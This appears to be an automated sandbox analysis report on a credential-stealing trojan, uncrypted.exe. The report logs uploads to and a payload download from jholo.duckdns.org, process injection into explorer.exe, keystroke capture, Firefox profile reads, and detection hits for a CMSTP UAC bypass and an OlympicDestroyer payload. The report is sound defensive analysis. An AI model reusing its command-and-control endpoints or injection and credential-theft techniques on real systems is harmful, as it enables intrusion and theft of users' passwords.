Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: jholo.duckdns.org | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 541
Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: jholo.duckdns.org | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 536
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 3_2_011B34A0 recv,3_2_011B34A0
Source: global traffic | HTTP traffic detected: GET /PASSWORDRECOVERY64EXE.EXE HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Host: jholo.duckdns.org:8181
Source: global traffic | DNS traffic detected: DNS query: jholo.duckdns.org
Source: unknown | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: jholo.duckdns.org | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 422
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/
Source: explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/L
Source: uncrypted.exe, 00000000.00000002.2055171521.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000004175000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000002.00000002.2041122621.0000000000475000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/PASSWORDRECOVERY32EXE.EXEhttp://jholo.duckdns.org:8181/PASSWORDRECOVER
Source: explorer.exe, explorer.exe, 00000003.00000003.2659390305.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291325405.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291451466.0000000000F84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/l
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/llu
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/n
Source: explorer.exe, explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084150348.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083994285.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085034739.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085061884.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084288266.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/upload.php
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/upload.php8
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/upload.phpcp=
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/upload.phphic
Source: explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/upload.phporage
Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://jholo.duckdns.org:8181/upload.phpy=part
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00413200 GetAsyncKeyState,Sleep,2_2_00413200
Source: explorer.exe, 00000003.00000002.3291834167.0000000003600000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ENCMARK RegisterRawInputDevicesmemstr_130513a5-d

                    System Summary

                    Source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.uncrypted.exe.11edea0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.4081f90.4.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.41021c0.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.explorer.exe.e70000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00410D50 Wow64DisableWow64FsRedirection,_memset,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,_memmove,_memmove,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,_memmove,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,Wow64DisableWow64FsRedirection,CloseHandle,CloseHandle,Wow64DisableWow64FsRedirection
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011A0740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                    Source: C:\Windows\explorer.exe | Code function: 3_2_01197940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011A11A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_01210D58
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_01210D4F
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_01211329
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004268E4
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004258F7
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0042612A
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0040E1E0
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0043127F
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00432BE4
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004264FC
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00430D2E
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00425D8C
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0041BEE0
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00431EAC
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0041BF39
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004317D0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_01191000
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011B2340
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011A9D20
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011A0740
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011AD600
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011B5E50
                    Source: C:\Windows\explorer.exe | Code function: 3_2_01197940
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011BF964
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011BE9BC
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011AD030
                    Source: C:\Windows\explorer.exe | Code function: 3_2_0119B8B0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_0119E8C0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_0119A8C0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011C3B2C
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011B23B6
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011C53F8
                    Source: C:\Windows\explorer.exe | Code function: 3_2_0119CBF0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011A12B0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011B9D1C
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011AA510
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011AC501
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011AAD50
                    Source: C:\Windows\explorer.exe | Code function: 3_2_01194DA0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011BCC2C
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011C5C5C
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011AC480
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011C6708
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011B2790
                    Source: C:\Windows\explorer.exe | Code function: 3_2_0119DE20
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011A2690
                    Source: C:\Windows\explorer.exe | Code function: 3_2_01197EF0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E71000
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E792B0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E733A0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E754C0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E76D60
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F08090
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F30190
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E86180
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F183B0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F31370
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00EFA300
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00EA0490
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00EF6400
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F3D5A8
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F3A564
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E76530
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E7A690
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F307F0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F3B73C
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F0271A
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F3A9E4
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F31980
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E8DB40
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F2FCE0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F35CE0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F34C84
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E7ADF0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F33DA0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00EA3DB0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00EFEDB0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F0FD60
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E75D00
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F30EB0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F01E7F
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F3AFD0
                    Source: C:\Windows\explorer.exe | Code function: String function: 00EC3BD0 appears 137 times
                    Source: C:\Windows\explorer.exe | Code function: String function: 011B84A8 appears 48 times
                    Source: C:\Windows\explorer.exe | Code function: String function: 00E85B10 appears 59 times
                    Source: C:\Windows\explorer.exe | Code function: String function: 00EA2F20 appears 47 times
                    Source: uncrypted.exe, 00000000.00000002.2050791832.000000000109E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs uncrypted.exe
                    Source: uncrypted.exe, 00000000.00000000.2031882370.00000000009A9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFour.exeL vs uncrypted.exe
                    Source: uncrypted.exe | Binary or memory string: OriginalFilenameFour.exeL vs uncrypted.exe
                    Source: uncrypted.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.uncrypted.exe.11edea0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.4081f90.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.41021c0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.explorer.exe.e70000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: uncrypted.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@7/2@3/1
                    Source: C:\Windows\explorer.exe | Code function: 3_2_01191BA0 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00407280 _memset,_memset,CoCreateInstance,_memset,__snwprintf,_memset
                    Source: C:\Users\user\Desktop\uncrypted.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uncrypted.exe.log
                    Source: C:\Users\user\Desktop\uncrypted.exe | Mutant created: NULL
                    Source: C:\Users\user\Desktop\uncrypted.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                    Source: C:\Users\user\Desktop\uncrypted.exe | Mutant created: \Sessions\1\BaseNamedObjects\{CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}
                    Source: C:\Users\user\Desktop\uncrypted.exe | Mutant created: \Sessions\1\BaseNamedObjects\{254EC4A5-B06F-451B-BA3F-2BA8CE48C450}
                    Source: C:\Users\user\Desktop\uncrypted.exe | Mutant created: \Sessions\1\BaseNamedObjects\{56B2BCE6-A24C-48AB-82DC-EE1FC9C9389D}
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\DATABASE
                    Source: C:\Users\user\Desktop\uncrypted.exe | Process created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
                    Source: uncrypted.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: uncrypted.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\uncrypted.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: explorer.exe, 00000003.00000002.3291834167.0000000003600000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2059308070.000000000343A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: explorer.exe, 00000004.00000003.2060274019.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2060991623.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2060460027.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2061349534.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2061440789.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, DATABASE.4.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: uncrypted.exe | Virustotal: Detection: 61%
                    Source: uncrypted.exe | ReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\uncrypted.exe | File read: C:\Users\user\Desktop\uncrypted.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"
                    Source: C:\Users\user\Desktop\uncrypted.exe | Process created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"
                    Source: C:\Users\user\Desktop\uncrypted.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                    Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: wtsapi32.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: msi.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: dbghelp.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: dbgcore.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | Section loaded: profapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
                    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
                    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
                    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
